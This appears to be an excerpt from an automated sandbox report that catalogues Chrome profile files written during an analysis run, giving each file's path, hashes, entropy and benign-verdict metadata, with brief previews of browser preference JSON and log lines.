                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent StateM (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3343
                                                                                                                                                                Entropy (8bit):4.945222848960228
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YXsVVMHzzsmdAMHtKsyfDszmcQ/RLsOcXSsM1PzshVMH8sp1AAMHDysKGMHTFsB5:PGqGctrmKwGPTGD7GSGMphH
                                                                                                                                                                MD5:CAB8BEABE7E66A4015C98A3C77B3698B
                                                                                                                                                                SHA1:C960AAAEA7014E105290C7D0F09BFCA837C8E8CC
                                                                                                                                                                SHA-256:75431010BFE77818B8BEF4B0C4B328C00668DC6B13C09AAB769EBF58BDA4EDF7
                                                                                                                                                                SHA-512:0D1E94E84294AEA4BF400FF9D0654748BFFEB92D3A1643A6A13B541ADB1BC13EA2F649560A27C8CC3D8AEF9DA5D6B668C7E3BE696091CE882A475B91A9A4CAC8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13270230891381309","port":443,"protocol_str":"quic"},{"advertised_alpns":["h3-Q050"],"expiration":"13270230891381310","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":39697},"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13270230887958662","port":443,"protocol_str":"quic"},{"advertised_alpns":["h3-Q050"],"expiration":"13270230887958664","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":52163},"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13270230886326794","port":443,"protocol_str":"quic"},{"advertised_alpns":["h3-Q050"],"expiration":"13270230886326795","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://clients2.google.com","supports_spdy
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent Stateom (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1692
                                                                                                                                                                Entropy (8bit):4.946447236044282
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:Y2TtwDHXPqn3zsOUZADs3LRLshVyvTYhbD:JTODHXin1qAQy+0hH
                                                                                                                                                                MD5:B3BCC192F8F6CA097CF62E784CE4C9E9
                                                                                                                                                                SHA1:D6961E9301B6CDF23543DF70E4841CF971504E09
                                                                                                                                                                SHA-256:2F5F9570050AB1BFE1CF856270FFCDD24B233BA1905A0BFCB7D9860388917C78
                                                                                                                                                                SHA-512:999C125EC277BD8B8DB25FDCCACDD4D7C7E6B562AE5C6600EA837D2E4B5D8FB7BF99D7CFA1E70C87663DA126B6C714F98A8E7990AA54E0580AE152ED5DC3846D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://update.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://www.google.com","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13276231834467595","port":443,"protocol_str":"quic"},{"advertised_alpns":["h3-Q050"],"expiration":"13276231834467598","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13276231834469104","port":443,"protocol_str":"quic"},{"advertised_alpns"
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4794
                                                                                                                                                                Entropy (8bit):5.24749425498766
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:nvAdIllnHa8KIN1aRWMoiVmdexVrMVXAiZw4:nodWHa8MWMBVq
                                                                                                                                                                MD5:E20011D796B928DF928BD3C7188DCB63
                                                                                                                                                                SHA1:39056EACA6FAF710C7D003EFF9194DCA6FAC1CE9
                                                                                                                                                                SHA-256:F676A94A4FB5231B8FE53D570DE9BB09F6F1C49E96EC271F731B085E3F74E95B
                                                                                                                                                                SHA-512:E8A124AE0243B1969A976D14B90D33F87B83A18111A3E8655435D57AC9AB18D1EF97483AE950258C8E8FC64ED39D804F5A3CC2DA659BF13D26462E926AEF52D8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autocomplete":{"retention_policy_last_version":92},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693,"this_week_services_downstream_foreground_kb":{"115188287":27,"125522256":1,"21145003":1051,"35565745":1,"49601082":1,"50464499":1,"5151071":1,"54845618":5}},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"download":{"directory_upgrade":true},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"install_signature":{"expire_date":"2021-11-08","ids":["pkedcjkdefgpdelpbcmbmeomcjbeemfm"],"invalid_ids":[],"salt":"P/VqSXKpUCSngasss21FVFHriEg3LI9c8GPtJCELXkM=","s
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences\ (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4108
                                                                                                                                                                Entropy (8bit):5.00328268195565
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcBcvlprAGqKlQKHoTw0pB/Pw8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGLrVrqooH:n8AdKINuaRWMoiVmde+VrMVXAiZw4
                                                                                                                                                                MD5:49339D264E2E6524CFC8EAE54EDB1EA8
                                                                                                                                                                SHA1:E7E959B1BB7CEF10FB229BA0F05560717CA4D320
                                                                                                                                                                SHA-256:AF4975729DF354F89A9CDA8AA980C2CE90932A6779DC14E089A820302F35701B
                                                                                                                                                                SHA-512:DCA04B386076322564034343E94B5C09BEA636DEBE72392654EE5ABF214EB51BA5693F3AC15EB682602B04A03C312A72B319CD24E988EAB96D03F3819D19F2B1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autocomplete":{"retention_policy_last_version":92},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693,"this_week_services_downstream_foreground_kb":{"115188287":27,"125522256":1,"21145003":1051,"35565745":1,"5151071":1}},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"download":{"directory_upgrade":true},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"last_chrome_version":"92.0.4515.107"},"gaia_cookie":{"changed_time":1629166234.486642,"hash":"2jmj7l5rSw0yVb/vlWAYkK/YBwk=","last_list_accounts_data":"[\"gaia.l.a.r\",[]]"},"gcm":{"product_category_for_
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences\* (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3488
                                                                                                                                                                Entropy (8bit):4.950593325875801
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcsvlSrAN4qwoTw0pB/nw8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGgrtqoonVuzip:n50nNmaRWMoiVmdeVtMVuzip
                                                                                                                                                                MD5:045C0EBF4C833D8A4A9EAA9723D5EB02
                                                                                                                                                                SHA1:EF28657CEFCE81216DFF3F608CD6310C4E6AC757
                                                                                                                                                                SHA-256:9B69787E9926249202EA2E9132E15FC8EBC39E4557F5AB3B753987413C050126
                                                                                                                                                                SHA-512:782CE44E864A54C38119AF18C3C297BF6458F69BCEBB1C638E39A7EE3C241E68DE16E6DEE5DB5C869296A4A6FF28A68D35FF1219653468B6130D9F0D51D046A6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"last_chrome_version":"92.0.4515.107"},"gcm":{"product_category_for_subtypes":"com.chrome.windows"},"google":{"services":{"signin_scoped_device_id":"b94e6f13-7987-48dc-98f4-d60c75c3dbd7"}},"intl":{"selected_languages":"en-US,en"},"invalidation":{"per_sender_topics_to_handler":{"1013309121859":{},"8181035976":{}}},"media":{"device_id_salt":"099511625CE63697AD937561012FD491","engagement":{"schema_version":4}},
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferencesex (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3488
                                                                                                                                                                Entropy (8bit):4.950763973648408
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcsvlSrAN4qwoTw0pB/nw8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGgrtqoonVuAip:n50nNmaRWMoiVmdeVtMVuAip
                                                                                                                                                                MD5:9C92AB8E1E9E924BD362FFBAD4C4B312
                                                                                                                                                                SHA1:F860816E33FA0B1ADCFBFADCED9D493721C41FC8
                                                                                                                                                                SHA-256:5C79045F01894515A73F7842ADC44028C12F5956D85F00375E99BDDB9103394E
                                                                                                                                                                SHA-512:2BFBA06032032232BFA80F316489E917A3F77CF95FD16755CF7B08D586F03026EA78F83B23C49EC024E50581BB5604F1AF474F21F57637AA0C08347F97AF0042
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"last_chrome_version":"92.0.4515.107"},"gcm":{"product_category_for_subtypes":"com.chrome.windows"},"google":{"services":{"signin_scoped_device_id":"b94e6f13-7987-48dc-98f4-d60c75c3dbd7"}},"intl":{"selected_languages":"en-US,en"},"invalidation":{"per_sender_topics_to_handler":{"1013309121859":{},"8181035976":{}}},"media":{"device_id_salt":"099511625CE63697AD937561012FD491","engagement":{"schema_version":4}},
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferencesn (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4198
                                                                                                                                                                Entropy (8bit):5.014393042635659
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcBcvlVvErAGqKlQKHoTw0pB/Ew8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGqrVrqH:nzAdKIN1aRWMoiVmdexVrMVXAiZw4
                                                                                                                                                                MD5:C8BA2271CEAEEC958D05A61C0FA6A46B
                                                                                                                                                                SHA1:408388C34517EBF2D5CE3CDEB054C23371FF5B07
                                                                                                                                                                SHA-256:73DE4038741F2EBE8491226278D905927D497ED6AAF652EBDD7BF0DF1995EC2B
                                                                                                                                                                SHA-512:B9F9D278CCBFC20B4C25EBA5526E44DB3F5489E6D12995FC1F8EF497F51426B9C283F3C4E8F1622EB66C03D73E2B89D4789F66416BC25F9F5D13923645E3EC9D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):21102
                                                                                                                                                                Entropy (8bit):5.533022210199644
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:OiztQLl7XQ1kXqKf/pUZNCgVLH2HfEarULdHGGnHfn/m4i:GLljQ1kXqKf/pUZNCgVLH2HftrULBGGU
                                                                                                                                                                MD5:CD448B36767EC023BF56DCE73376DD16
                                                                                                                                                                SHA1:0950071C9DE6436367092331F145B2BB707877D0
                                                                                                                                                                SHA-256:3CEE50ACE3665FA5BECCE1C891574F7F4E71F95B15A12251CB308F6ACE1D9A85
                                                                                                                                                                SHA-512:CAE08E011274ED298F377BB8CA117158EF2422EA646C471551C0587404A67AFC756C4385A10C64A8C6A99B47C1A6CFEA624E47EAA2089B81F28AE19A0E60049D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences00 (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15154
                                                                                                                                                                Entropy (8bit):5.580392987991728
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:OUptaLl7Xl1kXqKf/pUZNCgVLH2HfEKrU5m+m4k:4Lljl1kXqKf/pUZNCgVLH2HfzrU5XmL
                                                                                                                                                                MD5:5AF9337C8C8CC0DC77EDB919BCDA0BA9
                                                                                                                                                                SHA1:FBF5E771847BB6217EF8679568D354642FD04B08
                                                                                                                                                                SHA-256:6B43675406FF7B40A8CCAF2D98807BF2974268A7444511C902BE9289F7ADF1B3
                                                                                                                                                                SHA-512:5DFFA7577A3EBB8ADFE37C71A25E5AF7ACC2CC225FAE67BCD82F0DCF5972CB974E5FFDAE143A91747428A8E68C148FA50B65B26DF147F4D8D9B0B93F0A46F966
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):327
                                                                                                                                                                Entropy (8bit):2.5384726236607107
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:S85aEFljljljljljljljljljljljljljljl:S+a8ljljljljljljljljljljljljljlZ
                                                                                                                                                                MD5:A66EFAA590A0D16B1874A35836BA0A4B
                                                                                                                                                                SHA1:BB750C61E162420271F89A90F2B58F43587680E1
                                                                                                                                                                SHA-256:B9AB1ED7609E2254B7D4FB655B57B21B2BE601646C4FF0B207C411E8BDD9E654
                                                                                                                                                                SHA-512:2B1EA0C798B69B360AB1546D14FCCF7D5F9CB224B31BC8430CDB956C8CC570A086E4CFA10E6A843292DEB862F4161DFC9B9ABBC44AFE397FF0EC9563646FF7A5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):324
                                                                                                                                                                Entropy (8bit):5.145831994138907
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oCq2PlLN23iKKdKrQMxIFUtpvonVXZmwPvoZ47kwOlLN23iKKdKrQMFLJ:wCvy5KkCFUtpgVX/PgK5L5KktJ
                                                                                                                                                                MD5:0C18540842503F807DF96FB2275A9AFE
                                                                                                                                                                SHA1:67286C038A87EF157F5CDAEF7C08512EA3B9B6FE
                                                                                                                                                                SHA-256:43D6C924F74CE90589C7FDE3C12DB874906F2AF8C839343B3A9B835B41750CB2
                                                                                                                                                                SHA-512:B958DB49FCC2B6385D7663A5B9F90A455FC67E3B2FFC5D6ABFC91257405BAA031769B4E751C46634CCB75E7A4F54DAD937D018513A38FDAEE4866A93904C6439
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.557 1e80 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/MANIFEST-000001.2021/08/16-19:10:31.564 1e80 Recovering log #3.2021/08/16-19:10:31.565 1e80 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.oldld (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):324
                                                                                                                                                                Entropy (8bit):5.145831994138907
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oCq2PlLN23iKKdKrQMxIFUtpvonVXZmwPvoZ47kwOlLN23iKKdKrQMFLJ:wCvy5KkCFUtpgVX/PgK5L5KktJ
                                                                                                                                                                MD5:0C18540842503F807DF96FB2275A9AFE
                                                                                                                                                                SHA1:67286C038A87EF157F5CDAEF7C08512EA3B9B6FE
                                                                                                                                                                SHA-256:43D6C924F74CE90589C7FDE3C12DB874906F2AF8C839343B3A9B835B41750CB2
                                                                                                                                                                SHA-512:B958DB49FCC2B6385D7663A5B9F90A455FC67E3B2FFC5D6ABFC91257405BAA031769B4E751C46634CCB75E7A4F54DAD937D018513A38FDAEE4866A93904C6439
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.557 1e80 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/MANIFEST-000001.2021/08/16-19:10:31.564 1e80 Recovering log #3.2021/08/16-19:10:31.565 1e80 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13273639832636384
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3213
                                                                                                                                                                Entropy (8bit):3.193881839874912
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:3iYXxxP8zDRKIAnKU8CJ318BZD1C/BHUWKI8cZ6yU9czpzxR0M:3iq8fRKIm8CJF8BdI/Z8cZx
                                                                                                                                                                MD5:82032E42016A7BBD806A2457E9C1D0C4
                                                                                                                                                                SHA1:4D07894B452EE1A9BD7E5E4162D816D4D6B14E7F
                                                                                                                                                                SHA-256:1D093956AC91E44595D20944B4E04472B74EF061A90E359E9BA3089E23D0456F
                                                                                                                                                                SHA-512:BEE767BFC85ED9F2ECD0CF62CE7B26EE72A32FE34AC45B4E0DCBA5D3C1F61D3624EB4066A134D4AB3F52E2C52F581404FF395E90633344597A9EB7359A2282CA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13273639833235706
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6844
                                                                                                                                                                Entropy (8bit):3.144590886228538
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:3bKy92yDnlI55mpS2bT7Pm/Xb15sVWKeYSZ:31LxI5+rVW/Z
                                                                                                                                                                MD5:CEB9E8FA103979013E4D8181665CAB7B
                                                                                                                                                                SHA1:03272F8AC30B053C05353AE32C422D1D52BAEAFC
                                                                                                                                                                SHA-256:2DB778CE4EE2FA390476E8621F8283D0BCAE0BF06D4B88BFD635916E13221CC4
                                                                                                                                                                SHA-512:D5FD7431D4BAA2B22AAEAD5AB367E18E54452371580F002F30E2BD3BDD0B32C0316F4524CC08D811D92BF358B4873C7DBF28F4FE94BFB30DAF28E5E1514FE87C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):352
                                                                                                                                                                Entropy (8bit):5.080287839623628
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oeZq2PlLN23iKKdK7Uh2ghZIFUtpvo8OvZZmwPvo+vzkwOlLN23iKKdK7Uh2gd:wUvy5KkIhHh2FUtpgZvZ/Pg+75L5KkIT
                                                                                                                                                                MD5:B19D4A7E6A3A8A43352C94ED459FD4F7
                                                                                                                                                                SHA1:55AF2297E590934396E3EB9754606D3E745A2333
                                                                                                                                                                SHA-256:88E51B95684452312DEDDCD7EB38EACB89B750DDFEDB8037CDA2978043C2FD3E
                                                                                                                                                                SHA-512:8E2D724A93308A1003A27B8030AF065CA7AF548A154681F0790C0788D6919B9250F67AE10BC07D671715A796ADCD87922DD8AE6E49CBE91836069D81DF9E4563
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:30.126 1ce0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/MANIFEST-000001.2021/08/16-19:10:30.133 1ce0 Recovering log #3.2021/08/16-19:10:30.138 1ce0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):352
                                                                                                                                                                Entropy (8bit):5.080287839623628
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oeZq2PlLN23iKKdK7Uh2ghZIFUtpvo8OvZZmwPvo+vzkwOlLN23iKKdK7Uh2gd:wUvy5KkIhHh2FUtpgZvZ/Pg+75L5KkIT
                                                                                                                                                                MD5:B19D4A7E6A3A8A43352C94ED459FD4F7
                                                                                                                                                                SHA1:55AF2297E590934396E3EB9754606D3E745A2333
                                                                                                                                                                SHA-256:88E51B95684452312DEDDCD7EB38EACB89B750DDFEDB8037CDA2978043C2FD3E
                                                                                                                                                                SHA-512:8E2D724A93308A1003A27B8030AF065CA7AF548A154681F0790C0788D6919B9250F67AE10BC07D671715A796ADCD87922DD8AE6E49CBE91836069D81DF9E4563
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:30.126 1ce0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/MANIFEST-000001.2021/08/16-19:10:30.133 1ce0 Recovering log #3.2021/08/16-19:10:30.138 1ce0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\9c0bcb03-db83-4204-bcfc-1c915b9170f8.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):139
                                                                                                                                                                Entropy (8bit):4.762700853527964
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJqjn1KKtiKnMb1KKtiVY:YHpoeS7PMVKJw1K3KnMRK3VY
                                                                                                                                                                MD5:038931FF72A0C6AA0695A404960B1B22
                                                                                                                                                                SHA1:90802F36B75C3CA70FC8CD1CF8BDFBAE0E8723A4
                                                                                                                                                                SHA-256:BEF93811AE263E2E9145A44205340015843B1D4485D084BB642EAEB500FE564C
                                                                                                                                                                SHA-512:97903821D21BB748255C29BE83BCA5BE61E0E36719050D4BB780EBC35424202A23F3ED4EE0056833E7748F1D55D82A5F38476298C5012202776BEA411DA7001E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):434
                                                                                                                                                                Entropy (8bit):5.2079616022829
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:wlQ+vy5KkFFUtpgEuGKW/PgiQV5L5KkOJ:w5y5KkfgcGKmSL5KkK
                                                                                                                                                                MD5:0250667A023E9A727239F40413BF4122
                                                                                                                                                                SHA1:B9B0CA9B70630109343DBD06525D3DC9C083C6C3
                                                                                                                                                                SHA-256:F1BBB24DF40767DED9BE27AD392C11E29C14FEF3D88929267DE51EECC1F5E327
                                                                                                                                                                SHA-512:0DE0E41DA0765030964434794C688DF874FBE79F55F4A53C5B8BCA290AD41E32B886E536DF6F1CD7A575ECF196701DE06F59F944A80425B7E410EE138BB641D4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.569 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/MANIFEST-000001.2021/08/16-19:10:31.570 1eec Recovering log #3.2021/08/16-19:10:31.571 1eec Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/000003.log .
